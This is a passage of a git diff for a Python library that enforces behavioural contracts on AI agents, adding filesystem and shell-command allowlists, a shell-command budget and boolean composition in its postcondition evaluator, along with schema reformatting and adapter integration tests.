dict) else None - return ObservabilityConfig(traces=traces, metrics=metrics, violation_events=ve) + return ObservabilityConfig( + traces=traces, + metrics=metrics, + violation_events=ve, + run_artifact_path=raw.get("run_artifact_path"), + ) def _build_versioning(raw: Dict[str, Any]) -> VersioningConfig: @@ -211,14 +234,15 @@ def load_contract(source: Union[str, Path], *, strict: bool = True) -> Contract: contract_raw = data.get("contract", {}) postconditions = [_build_postcondition(p) for p in contract_raw.get("postconditions", [])] - # Tier 1 fields inputs_raw = data.get("inputs") input_schema = inputs_raw.get("schema") if isinstance(inputs_raw, dict) else None preconditions = None if isinstance(inputs_raw, dict) and "preconditions" in inputs_raw: preconditions = [ PreconditionDef( - name=p["name"], check=p["check"], description=p.get("description") + name=p["name"], + check=p["check"], + description=p.get("description"), ) for p in inputs_raw["preconditions"] ] @@ -238,7 +262,6 @@ def load_contract(source: Union[str, Path], *, strict: bool = True) -> Contract: resources_raw = data.get("resources") budgets = _build_budgets(resources_raw) if isinstance(resources_raw, dict) else None - # Tier 2 fields fm_raw = data.get("failure_model") failure_model = _build_failure_model(fm_raw) if isinstance(fm_raw, dict) else None @@ -270,5 +293,6 @@ def load_contract(source: Union[str, Path], *, strict: bool = True) -> Contract: observability=observability, versioning=versioning, slo=slo, + source_path=str(Path(source).resolve()), raw=data, ) diff --git a/src/agent_contracts/postconditions.py b/src/agent_contracts/postconditions.py index 48d4a17..2e2ef97 100644 --- a/src/agent_contracts/postconditions.py +++ b/src/agent_contracts/postconditions.py @@ -6,7 +6,8 @@ - async_monitor: queues for asynchronous evaluation Expression evaluator uses a restricted subset — NO eval() or exec(). -Supports basic comparisons, membership tests, and type checks. +Supports basic comparisons, membership tests, length checks, and simple +boolean composition with `and` / `or`. """ from __future__ import annotations @@ -18,7 +19,6 @@ from agent_contracts.types import PostconditionDef, PreconditionDef -# Safe operators for expression evaluation _OPERATORS = { "==": operator.eq, "!=": operator.ne, @@ -42,11 +42,6 @@ def __init__(self, postcondition: PostconditionDef, output: Any) -> None: def _resolve_path(obj: Any, path: str) -> Any: - """Resolve a dotted path like 'output.status' against an object or dict. - - Only traverses dicts by key lookup. Does not use getattr to avoid - triggering properties or descriptors on untrusted objects. - """ parts = path.split(".") current = obj for part in parts: @@ -60,7 +55,6 @@ def _resolve_path(obj: Any, path: str) -> Any: def _parse_value(token: str) -> Any: - """Parse a literal value token (string, number, bool, None, list).""" token = token.strip() if token == "None" or token == "null": return None @@ -72,7 +66,6 @@ def _parse_value(token: str) -> Any: return token[1:-1] if token.startswith("'") and token.endswith("'"): return token[1:-1] - # Try list literal: ["a", "b"] if token.startswith("[") and token.endswith("]"): inner = token[1:-1].strip() if not inner: @@ -87,11 +80,10 @@ def _parse_value(token: str) -> Any: return float(token) except ValueError: pass - return token # Treat as identifier path + return token def _split_list_items(s: str) -> List[str]: - """Split comma-separated items, respecting quoted strings.""" items: List[str] = [] current: List[str] = [] in_quote: Optional[str] = None @@ -113,65 +105,94 @@ def _split_list_items(s: str) -> List[str]: return items +def _split_logical(expr: str, operator_token: str) -> List[str]: + parts: List[str] = [] + current: List[str] = [] + depth = 0 + in_quote: Optional[str] = None + i = 0 + while i < len(expr): + ch = expr[i] + if in_quote: + current.append(ch) + if ch == in_quote: + in_quote = None + i += 1 + continue + if ch in ('"', "'"): + in_quote = ch + current.append(ch) + i += 1 + continue + if ch in "([": + depth += 1 + current.append(ch) + i += 1 + continue + if ch in ")]": + depth = max(0, depth - 1) + current.append(ch) + i += 1 + continue + if depth == 0 and expr.startswith(operator_token, i): + parts.append("".join(current).strip()) + current = [] + i += len(operator_token) + continue + current.append(ch) + i += 1 + if current: + parts.append("".join(current).strip()) + return parts + + def evaluate_expression(check: str, context: Dict[str, Any]) -> bool: - """Evaluate a CEL-like expression safely against a context dict. - - Supported forms: - - "output is not None" - - "output is None" - - "output.status == \"resolved\"" - - "output.status in [\"resolved\", \"escalated\"]" - - "output.status not in [\"failed\"]" - - "len(output.items) > 0" - - "output.score >= 0.8" - - "true" / "false" - - Returns True if the check passes, False otherwise. - """ check = check.strip() + or_parts = _split_logical(check, " or ") + if len(or_parts) > 1: + return any(evaluate_expression(part, context) for part in or_parts) + + and_parts = _split_logical(check, " and ") + if len(and_parts) > 1: + return all(evaluate_expression(part, context) for part in and_parts) + if check in ("true", "True"): return True if check in ("false", "False"): return False - # "X is not None" - m = re.match(r"^(\S+)\s+is\s+not\s+None$", check) - if m: - val = _resolve_path(context, m.group(1)) + match = re.match(r"^(\S+)\s+is\s+not\s+None$", check) + if match: + val = _resolve_path(context, match.group(1)) return val is not None - # "X is None" - m = re.match(r"^(\S+)\s+is\s+None$", check) - if m: - val = _resolve_path(context, m.group(1)) + match = re.match(r"^(\S+)\s+is\s+None$", check) + if match: + val = _resolve_path(context, match.group(1)) return val is None - # "X not in [...]" - m = re.match(r"^(\S+)\s+not\s+in\s+(\[.+\])$", check) - if m: - val = _resolve_path(context, m.group(1)) - allowed = _parse_value(m.group(2)) + match = re.match(r"^(\S+)\s+not\s+in\s+(\[.+\])$", check) + if match: + val = _resolve_path(context, match.group(1)) + allowed = _parse_value(match.group(2)) return val not in allowed - # "X in [...]" - m = re.match(r"^(\S+)\s+in\s+(\[.+\])$", check) - if m: - val = _resolve_path(context, m.group(1)) - allowed = _parse_value(m.group(2)) + match = re.match(r"^(\S+)\s+in\s+(\[.+\])$", check) + if match: + val = _resolve_path(context, match.group(1)) + allowed = _parse_value(match.group(2)) return val in allowed - # "len(X) op Y" - m = re.match(r"^len\((\S+)\)\s*(==|!=|>=?|<=?)\s*(.+)$", check) - if m: - val = _resolve_path(context, m.group(1)) + match = re.match(r"^len\((\S+)\)\s*(==|!=|>=?|<=?)\s*(.+)$", check) + if match: + val = _resolve_path(context, match.group(1)) if val is None: return False - op_fn = _OPERATORS[m.group(2)] - rhs = _parse_value(m.group(3)) + op_fn = _OPERATORS[match.group(2)] + rhs = _parse_value(match.group(3)) return bool(op_fn(len(val), rhs)) - # "X op Y" (comparison) for op_str in (">=", "<=", "!=", "==", ">", "<"): parts = check.split(op_str, 1) if len(parts) == 2: @@ -189,7 +210,6 @@ def evaluate_expression(check: str, context: Dict[str, Any]) -> bool: except TypeError: return False - # Fallback: treat as a path and check truthiness val = _resolve_path(context, check) return bool(val) @@ -219,13 +239,6 @@ def evaluate_preconditions( *, raise_on_failure: bool = True, ) -> List[PreconditionResult]: - """Evaluate all preconditions against input data. - - Preconditions use the same expression evaluator as postconditions. - Context key is 'input' instead of 'output'. - - If raise_on_failure is True, raises PreconditionError on first failure. - """ context: Dict[str, Any] = {"input": input_data} results: List[PreconditionResult] = [] @@ -255,14 +268,6 @@ def evaluate_postconditions( on_warn: Optional[Callable[[PostconditionDef, Any], None]] = None, on_async: Optional[Callable[[PostconditionDef, Any], None]] = None, ) -> List[PostconditionResult]: - """Evaluate all postconditions against an output. - - - sync_block: raises PostconditionError on failure - - sync_warn: calls on_warn callback on failure - - async_monitor: calls on_async callback (deferred evaluation) - - Returns list of results for all evaluated postconditions. - """ context: Dict[str, Any] = {"output": output} if extra_context: context.update(extra_context) @@ -273,21 +278,26 @@ def evaluate_postconditions( if pc.enforcement == "async_monitor": if on_async: on_async(pc, output) - results.append(PostconditionResult(postcondition=pc, passed=True, enforcement="async_monitor")) + results.append( + PostconditionResult(postcondition=pc, passed=True, enforcement="async_monitor") + ) continue - # Skip eval:judge checks — they require external LLM call if pc.check.startswith("eval:"): - results.append(PostconditionResult(postcondition=pc, passed=True, enforcement=pc.enforcement)) + results.append( + PostconditionResult(postcondition=pc, passed=True, enforcement=pc.enforcement) + ) continue passed = evaluate_expression(pc.check, context) - results.append(PostconditionResult(postcondition=pc, passed=passed, enforcement=pc.enforcement)) + results.append( + PostconditionResult(postcondition=pc, passed=passed, enforcement=pc.enforcement) + ) if not passed: if pc.enforcement == "sync_block": raise PostconditionError(pc, output) - elif pc.enforcement == "sync_warn" and on_warn: + if pc.enforcement == "sync_warn" and on_warn: on_warn(pc, output) return results diff --git a/src/agent_contracts/schemas/agent-contract.schema.json b/src/agent_contracts/schemas/agent-contract.schema.json index ef8667e..6ee5748 100644 --- a/src/agent_contracts/schemas/agent-contract.schema.json +++ b/src/agent_contracts/schemas/agent-contract.schema.json @@ -4,7 +4,11 @@ "title": "Agent Contract", "description": "YAML specification for enforceable agent behavioral contracts. Supports three graduated tiers: Standalone (Tier 0), Enforceable (Tier 1), and Composable (Tier 2).", "type": "object", - "required": ["agent_contract", "identity", "contract"], + "required": [ + "agent_contract", + "identity", + "contract" + ], "additionalProperties": true, "patternProperties": { "^x-": { @@ -54,7 +58,10 @@ "$defs": { "Identity": { "type": "object", - "required": ["name", "version"], + "required": [ + "name", + "version" + ], "additionalProperties": true, "properties": { "name": { @@ -73,27 +80,36 @@ }, "authors": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of agent authors or maintainers." } } }, "Contract": { "type": "object", - "required": ["postconditions"], + "required": [ + "postconditions" + ], "additionalProperties": true, "properties": { "postconditions": { "type": "array", "minItems": 1, - "items": { "$ref": "#/$defs/Postcondition" }, + "items": { + "$ref": "#/$defs/Postcondition" + }, "description": "At least one machine-checkable output guarantee. This is what makes it a contract, not a README." } } }, "Postcondition": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "additionalProperties": true, "properties": { "name": { @@ -108,13 +124,21 @@ }, "enforcement": { "type": "string", - "enum": ["sync_block", "sync_warn", "async_monitor"], + "enum": [ + "sync_block", + "sync_warn", + "async_monitor" + ], "default": "sync_warn", "description": "When and how this check runs. sync_block: fails the invocation. sync_warn: logs warning. async_monitor: evaluates asynchronously." }, "severity": { "type": "string", - "enum": ["critical", "major", "minor"], + "enum": [ + "critical", + "major", + "minor" + ], "default": "major", "description": "Impact level when this postcondition fails." }, @@ -155,11 +179,20 @@ "type": "array", "items": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "properties": { - "name": { "type": "string" }, - "check": { "type": "string" }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "check": { + "type": "string" + }, + "description": { + "type": "string" + } } }, "description": "Preconditions that must hold before the agent runs." @@ -190,44 +223,62 @@ }, "EffectsAuthorized": { "type": "object", - "description": "Capability scope — what the agent MAY do. Default: deny all. Composes via intersection during delegation.", + "description": "Capability scope \u2014 what the agent MAY do. Default: deny all. Composes via intersection during delegation.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of tool names or glob patterns (e.g., 'database.*'). Tools not listed are BLOCKED." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed network egress URL patterns (e.g., 'https://api.example.com/*')." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed state write scope patterns (e.g., 'tickets.*', 'user.preferences')." + }, + "filesystem": { + "$ref": "#/$defs/FilesystemAuthorization" + }, + "shell": { + "$ref": "#/$defs/ShellAuthorization" } } }, "EffectsDeclared": { "type": "object", - "description": "Effect footprint — what side effects actually occur. Composes via union for auditing. Runtime enforces declared ⊆ authorized.", + "description": "Effect footprint \u2014 what side effects actually occur. Composes via union for auditing. Runtime enforces declared \u2286 authorized.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Tools that this agent actually invokes." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Network endpoints this agent actually contacts." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "State scopes this agent actually modifies." } } @@ -260,6 +311,11 @@ "type": "number", "exclusiveMinimum": 0, "description": "Maximum wall-clock time in seconds per invocation." + }, + "max_shell_commands": { + "type": "integer", + "exclusiveMinimum": 0, + "description": "Maximum number of shell commands per invocation." } } } @@ -274,7 +330,9 @@ "type": "array", "items": { "type": "object", - "required": ["name"], + "required": [ + "name" + ], "additionalProperties": true, "properties": { "name": { @@ -346,7 +404,9 @@ }, "allowed_agents": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of agent names that can be delegated to." } } @@ -359,32 +419,64 @@ "traces": { "type": "object", "properties": { - "enabled": { "type": "boolean", "default": true }, - "sample_rate": { "type": "number", "minimum": 0, "maximum": 1 } + "enabled": { + "type": "boolean", + "default": true + }, + "sample_rate": { + "type": "number", + "minimum": 0, + "maximum": 1 + } } }, "metrics": { "type": "array", "items": { "type": "object", - "required": ["name", "type"], + "required": [ + "name", + "type" + ], "properties": { - "name": { "type": "string" }, - "type": { "type": "string", "enum": ["counter", "histogram", "gauge"] }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "type": { + "type": "string", + "enum": [ + "counter", + "histogram", + "gauge" + ] + }, + "description": { + "type": "string" + } } } }, "violation_events": { "type": "object", "properties": { - "emit": { "type": "boolean", "default": true }, + "emit": { + "type": "boolean", + "default": true + }, "destination": { "type": "string", - "enum": ["stdout", "otel", "callback"], + "enum": [ + "stdout", + "otel", + "callback" + ], "default": "stdout" } } + }, + "run_artifact_path": { + "type": "string", + "description": "Repo-local verdict artifact path template. Supports {run_id}." } } }, @@ -399,7 +491,9 @@ }, "breaking_changes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of breaking changes from the previous version." }, "substitution": { @@ -407,7 +501,9 @@ "properties": { "compatible_with": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Versions this agent can substitute for (Liskov-style)." } } @@ -422,22 +518,36 @@ "contract_satisfaction_rate": { "type": "object", "properties": { - "target": { "type": "number", "minimum": 0, "maximum": 1 }, - "window": { "type": "string" } + "target": { + "type": "number", + "minimum": 0, + "maximum": 1 + }, + "window": { + "type": "string" + } } }, "latency": { "type": "object", "properties": { - "p50_ms": { "type": "number" }, - "p99_ms": { "type": "number" } + "p50_ms": { + "type": "number" + }, + "p99_ms": { + "type": "number" + } } }, "cost": { "type": "object", "properties": { - "avg_usd": { "type": "number" }, - "p99_usd": { "type": "number" } + "avg_usd": { + "type": "number" + }, + "p99_usd": { + "type": "number" + } } }, "error_budget_policy": { @@ -445,6 +555,39 @@ "description": "Action when error budget is exhausted (e.g., 'freeze_deployments', 'alert_only')." } } + }, + "FilesystemAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "read": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local read allowlist globs for coding/build agents." + }, + "write": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local write allowlist globs for coding/build agents." + } + } + }, + "ShellAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "commands": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Allowed shell command patterns (glob-style matching on normalized command strings)." + } + } } } } diff --git a/src/agent_contracts/types.py b/src/agent_contracts/types.py index 5120ead..5b35b1d 100644 --- a/src/agent_contracts/types.py +++ b/src/agent_contracts/types.py @@ -45,6 +45,21 @@ class PostconditionDef: # --- Tier 1: Enforceable --- +@dataclass(frozen=True) +class FilesystemAuthorization: + """Authorized repo-local filesystem scopes for coding/build agents.""" + + read: List[str] = field(default_factory=list) + write: List[str] = field(default_factory=list) + + +@dataclass(frozen=True) +class ShellAuthorization: + """Authorized shell command patterns for coding/build agents.""" + + commands: List[str] = field(default_factory=list) + + @dataclass(frozen=True) class EffectsAuthorized: """Capability scope — what the agent MAY do (default: deny all). @@ -55,6 +70,8 @@ class EffectsAuthorized: tools: List[str] = field(default_factory=list) network: List[str] = field(default_factory=list) state_writes: List[str] = field(default_factory=list) + filesystem: Optional[FilesystemAuthorization] = None + shell: Optional[ShellAuthorization] = None @dataclass(frozen=True) @@ -65,6 +82,7 @@ class ResourceBudgets: max_tokens: Optional[int] = None max_tool_calls: Optional[int] = None max_duration_seconds: Optional[float] = None + max_shell_commands: Optional[int] = None @dataclass(frozen=True) @@ -161,6 +179,7 @@ class ObservabilityConfig: traces: Optional[TracesConfig] = None metrics: List[MetricDef] = field(default_factory=list) violation_events: Optional[ViolationEventsConfig] = None + run_artifact_path: Optional[str] = None @dataclass(frozen=True) @@ -243,5 +262,8 @@ class Contract: versioning: Optional[VersioningConfig] = None slo: Optional[SLOConfig] = None + # Runtime metadata + source_path: Optional[str] = field(default=None, repr=False) + # Raw data (preserves x- extensions and unknown fields) raw: Optional[Dict[str, Any]] = field(default=None, repr=False) diff --git a/tests/conftest.py b/tests/conftest.py index 4490c09..cf84610 100644 --- a/tests/conftest.py +++ b/tests/conftest.py @@ -14,16 +14,13 @@ def tmp_yaml(tmp_path: Path): """Factory fixture — write a dict as YAML and return the path.""" def _write(data: Dict[str, Any], name: str = "contract.yaml") -> Path: - p = tmp_path / name - p.write_text(yaml.dump(data, sort_keys=False), encoding="utf-8") - return p + path = tmp_path / name + path.write_text(yaml.dump(data, sort_keys=False), encoding="utf-8") + return path return _write -# ---- Canonical contract data for each tier ---- - - @pytest.fixture def tier0_data() -> Dict[str, Any]: """Minimal Tier 0 contract (4 fields).""" @@ -40,7 +37,7 @@ def tier0_data() -> Dict[str, Any]: @pytest.fixture def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: - """Tier 1 contract with schemas, effects, and budgets.""" + """Tier 1 contract with coding/build authorization surfaces.""" return { **tier0_data, "inputs": {"schema": {"type": "object", "properties": {"query": {"type": "string"}}}}, @@ -50,6 +47,11 @@ def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: "tools": ["search", "database.read"], "network": ["https://api.example.com/*"], "state_writes": [], + "filesystem": { + "read": ["src/**", "tests/**", "README.md"], + "write": ["src/**", "tests/**"], + }, + "shell": {"commands": ["python -m pytest *", "python -m ruff check *"]}, } }, "resources": { @@ -58,6 +60,7 @@ def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: "max_tokens": 10000, "max_tool_calls": 20, "max_duration_seconds": 30.0, + "max_shell_commands": 5, } }, } @@ -65,7 +68,7 @@ def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: @pytest.fixture def tier2_data(tier1_data: Dict[str, Any]) -> Dict[str, Any]: - """Tier 2 contract with all composable fields.""" + """Tier 2 contract with composable fields and verdict artifact path.""" return { **tier1_data, "effects": { @@ -97,6 +100,7 @@ def tier2_data(tier1_data: Dict[str, Any]) -> Dict[str, Any]: {"name": "latency_ms", "type": "histogram"}, ], "violation_events": {"emit": True, "destination": "otel"}, + "run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json", }, "versioning": { "build_id": "sha256:abc123", diff --git a/tests/test_adapters/test_claude_agent.py b/tests/test_adapters/test_claude_agent.py index 43e5b71..a90110c 100644 --- a/tests/test_adapters/test_claude_agent.py +++ b/tests/test_adapters/test_claude_agent.py @@ -113,3 +113,26 @@ def test_violations_accumulated(self, hooks) -> None: "tool_input": {}, })) assert len(hooks.violations) == 1 + + +class TestRealSDKIntegration: + """Verifies the hooks dict produced by the adapter is consumable by the + real claude-agent-sdk. Skipped if claude-agent-sdk is not installed + (it requires Python 3.10+).""" + + def test_hooks_config_accepted_by_sdk(self, hooks) -> None: + sdk = pytest.importorskip("claude_agent_sdk") + config = hooks.get_hooks_config() + # Real SDK exposes ClaudeAgentOptions and accepts a hooks mapping. + options = sdk.ClaudeAgentOptions(hooks=config) + assert options.hooks is config + + def test_pre_tool_use_signature_matches_hookcallback(self) -> None: + sdk = pytest.importorskip("claude_agent_sdk") + # Adapter callbacks must accept (input_data, tool_use_id, context). + assert hasattr(sdk, "HookCallback") + import inspect + sig = inspect.signature(ContractHooks.pre_tool_use) + params = list(sig.parameters) + # self + 3 hook params + assert params[1:] == ["input_data", "tool_use_id", "context"] diff --git a/tests/test_adapters/test_crewai.py b/tests/test_adapters/test_crewai.py deleted file mode 100644 index 07ecc86..0000000 --- a/tests/test_adapters/test_crewai.py +++ /dev/null @@ -1,76 +0,0 @@ -"""Tests for CrewAI adapter.""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Dict -from unittest.mock import MagicMock - -import pytest -import yaml - -from agent_contracts.adapters.crewai import ContractGuard -from agent_contracts.enforcer import ContractViolation - - -@pytest.fixture -def guard(tmp_path: Path, tier1_data: Dict[str, Any]) -> ContractGuard: - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - return ContractGuard.from_file(p, violation_destination="callback", - violation_callback=lambda e: None) - - -class TestContractGuard: - def test_from_file(self, guard) -> None: - assert guard.enforcer is not None - - def test_validate_inputs(self, guard) -> None: - errors = guard.validate_inputs({"query": "hello"}) - assert errors == [] - - def test_check_authorized_tool(self, guard) -> None: - guard.check_tool("search") - - def test_check_unauthorized_tool(self, guard) -> None: - with pytest.raises(ContractViolation): - guard.check_tool("evil_tool") - - def test_execute_crew(self, guard) -> None: - mock_crew = MagicMock() - mock_crew.kickoff.return_value = "result" - result = guard.execute(mock_crew, inputs={"query": "test"}) - assert result == "result" - mock_crew.kickoff.assert_called_once() - - def test_execute_with_invalid_input(self, tmp_path, tier1_data) -> None: - tier1_data["inputs"]["schema"]["required"] = ["query"] - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - guard = ContractGuard.from_file(p, violation_destination="callback", - violation_callback=lambda e: None) - mock_crew = MagicMock() - with pytest.raises(ContractViolation, match="Input validation"): - guard.execute(mock_crew, inputs={"wrong_field": "test"}) - - def test_wrap_tool(self, guard) -> None: - def my_tool(x: int) -> int: - return x * 2 - - wrapped = guard.wrap_tool(my_tool, "search") - assert wrapped(5) == 10 - - def test_wrap_unauthorized_tool(self, guard) -> None: - def my_tool() -> str: - return "result" - - wrapped = guard.wrap_tool(my_tool, "unauthorized_tool") - with pytest.raises(ContractViolation): - wrapped() - - def test_violations_tracked(self, guard) -> None: - try: - guard.check_tool("bad") - except ContractViolation: - pass - assert len(guard.violations) == 1 diff --git a/tests/test_adapters/test_langchain.py b/tests/test_adapters/test_langchain.py index 7c0b25a..164241e 100644 --- a/tests/test_adapters/test_langchain.py +++ b/tests/test_adapters/test_langchain.py @@ -61,3 +61,18 @@ def test_chain_end_postconditions(self, handler) -> None: def test_on_tool_end(self, handler) -> None: handler.on_tool_end("result") # No-op, should not raise + + +class TestRealSDKIntegration: + """Verifies the adapter is a real subclass of the installed + langchain-core BaseCallbackHandler. Skipped if langchain-core absent.""" + + def test_subclass_of_real_base_callback_handler(self, handler) -> None: + callbacks = pytest.importorskip("langchain_core.callbacks") + assert isinstance(handler, callbacks.BaseCallbackHandler) + + def test_hook_method_signatures_present(self) -> None: + callbacks = pytest.importorskip("langchain_core.callbacks") + for name in ("on_tool_start", "on_tool_end", "on_chain_end", "on_llm_end"): + assert hasattr(callbacks.BaseCallbackHandler, name), f"SDK missing {name}" + assert hasattr(ContractCallbackHandler, name), f"adapter missing {name}" diff --git a/tests/test_adapters/test_openai_agents.py b/tests/test_adapters/test_openai_agents.py index 3bc88f4..6918f9f 100644 --- a/tests/test_adapters/test_openai_agents.py +++ b/tests/test_adapters/test_openai_agents.py @@ -101,3 +101,32 @@ def test_on_handoff(self, hooks) -> None: def test_on_llm_start(self, hooks) -> None: run_async(hooks.on_llm_start(None, None, None, None)) + + +class TestRealSDKIntegration: + """Verifies the adapter is a real subclass of the installed SDK's + RunHooks base class. Skipped if openai-agents is not installed.""" + + def test_subclass_of_real_runhooks(self, hooks) -> None: + # agents.RunHooks is a parameterized generic alias + # (RunHooksBase[TContext, Agent]); the actual base class lives in + # agents.lifecycle and is what the adapter must subclass. + pytest.importorskip("agents") + from agents.lifecycle import RunHooksBase + assert issubclass(ContractRunHooks, RunHooksBase) + assert isinstance(hooks, RunHooksBase) + + def test_hook_method_signatures_present(self) -> None: + pytest.importorskip("agents") + from agents.lifecycle import RunHooksBase + for name in ( + "on_tool_start", + "on_tool_end", + "on_llm_start", + "on_llm_end", + "on_agent_start", + "on_agent_end", + "on_handoff", + ): + assert hasattr(RunHooksBase, name), f"SDK is missing {name}" + assert hasattr(ContractRunHooks, name), f"adapter is missing {name}" diff --git a/tests/test_adapters/test_pydantic_ai.py b/tests/test_adapters/test_pydantic_ai.py deleted file mode 100644 index 3972a62..0000000 --- a/tests/test_adapters/test_pydantic_ai.py +++ /dev/null @@ -1,58 +0,0 @@ -"""Tests for Pydantic AI adapter.""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Dict - -import pytest -import yaml - -from agent_contracts.adapters.pydantic_ai import ContractMiddleware -from agent_contracts.enforcer import ContractViolation - - -@pytest.fixture -def middleware(tmp_path: Path, tier1_data: Dict[str, Any]) -> ContractMiddleware: - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - return ContractMiddleware.from_file(p, violation_destination="callback", - violation_callback=lambda e: None) - - -class TestContractMiddleware: - def test_from_file(self, middleware) -> None: - assert middleware.enforcer is not None - - def test_check_authorized_tool(self, middleware) -> None: - middleware.check_tool("search") - - def test_check_unauthorized_tool(self, middleware) -> None: - with pytest.raises(ContractViolation): - middleware.check_tool("evil_tool") - - def test_validate_result(self, middleware) -> None: - errors = middleware.validate_result({"result": "ok"}) - assert errors == [] - - def test_wrap_tool(self, middleware) -> None: - def search(q: str) -> str: - return f"found: {q}" - - wrapped = middleware.wrap_tool(search, "search") - assert wrapped("test") == "found: test" - - def test_wrap_unauthorized_tool(self, middleware) -> None: - def bad_tool() -> str: - return "nope" - - wrapped = middleware.wrap_tool(bad_tool, "unauthorized") - with pytest.raises(ContractViolation): - wrapped() - - def test_violations_tracked(self, middleware) -> None: - try: - middleware.check_tool("bad") - except ContractViolation: - pass - assert len(middleware.violations) == 1 diff --git a/tests/test_budgets.py b/tests/test_budgets.py index 2b20d43..0492e2a 100644 --- a/tests/test_budgets.py +++ b/tests/test_budgets.py @@ -3,6 +3,7 @@ from __future__ import annotations import threading +import time import pytest @@ -18,52 +19,54 @@ def test_no_config_allows_all(self) -> None: tracker.add_tokens(1_000_000) for _ in range(1000): tracker.record_tool_call() - tracker.check_all() # Should not raise + tracker.record_shell_command() + tracker.check_all() def test_cost_limit(self) -> None: - budgets = ResourceBudgets(max_cost_usd=1.00) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_cost_usd=1.00)) tracker.add_cost(0.50) tracker.add_cost(0.40) with pytest.raises(BudgetExceededError, match="cost_usd"): tracker.add_cost(0.20) def test_token_limit(self) -> None: - budgets = ResourceBudgets(max_tokens=1000) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tokens=1000)) tracker.add_tokens(800) with pytest.raises(BudgetExceededError, match="tokens"): tracker.add_tokens(300) def test_tool_call_limit(self) -> None: - budgets = ResourceBudgets(max_tool_calls=3) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tool_calls=3)) tracker.record_tool_call() tracker.record_tool_call() tracker.record_tool_call() with pytest.raises(BudgetExceededError, match="tool_calls"): tracker.record_tool_call() - def test_duration_limit(self) -> None: - budgets = ResourceBudgets(max_duration_seconds=0.01) - tracker = BudgetTracker(budgets) - import time + def test_shell_command_limit(self) -> None: + tracker = BudgetTracker(ResourceBudgets(max_shell_commands=1)) + tracker.record_shell_command() + with pytest.raises(BudgetExceededError, match="shell_commands"): + tracker.record_shell_command() + def test_duration_limit(self) -> None: + tracker = BudgetTracker(ResourceBudgets(max_duration_seconds=0.01)) time.sleep(0.02) with pytest.raises(BudgetExceededError, match="duration_seconds"): tracker.check_duration() def test_snapshot(self) -> None: - budgets = ResourceBudgets(max_cost_usd=10.0) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_cost_usd=10.0)) tracker.add_cost(1.50) tracker.add_tokens(500) tracker.record_tool_call() - snap = tracker.snapshot() - assert snap.cost_usd == 1.50 - assert snap.tokens == 500 - assert snap.tool_calls == 1 - assert snap.elapsed_seconds >= 0 + tracker.record_shell_command() + snapshot = tracker.snapshot() + assert snapshot.cost_usd == 1.50 + assert snapshot.tokens == 500 + assert snapshot.tool_calls == 1 + assert snapshot.shell_commands == 1 + assert snapshot.elapsed_seconds >= 0 def test_cost_callback(self) -> None: cost_value = [0.0] @@ -71,37 +74,34 @@ def test_cost_callback(self) -> None: def get_cost() -> float: return cost_value[0] - budgets = ResourceBudgets(max_cost_usd=1.00) - tracker = BudgetTracker(budgets, cost_callback=get_cost) + tracker = BudgetTracker(ResourceBudgets(max_cost_usd=1.00), cost_callback=get_cost) cost_value[0] = 0.50 - tracker.check_all() # OK + tracker.check_all() cost_value[0] = 1.50 with pytest.raises(BudgetExceededError, match="cost_usd"): tracker.check_all() def test_reset(self) -> None: - budgets = ResourceBudgets(max_tool_calls=5) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tool_calls=5, max_shell_commands=5)) for _ in range(4): tracker.record_tool_call() + tracker.record_shell_command() tracker.reset() - snap = tracker.snapshot() - assert snap.tool_calls == 0 - assert snap.cost_usd == 0.0 + snapshot = tracker.snapshot() + assert snapshot.tool_calls == 0 + assert snapshot.shell_commands == 0 + assert snapshot.cost_usd == 0.0 def test_negative_cost_rejected(self) -> None: - tracker = BudgetTracker() with pytest.raises(ValueError, match="non-negative"): - tracker.add_cost(-1.0) + BudgetTracker().add_cost(-1.0) def test_negative_tokens_rejected(self) -> None: - tracker = BudgetTracker() with pytest.raises(ValueError, match="non-negative"): - tracker.add_tokens(-1) + BudgetTracker().add_tokens(-1) def test_thread_safety(self) -> None: - budgets = ResourceBudgets(max_tool_calls=10_000) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tool_calls=10_000)) 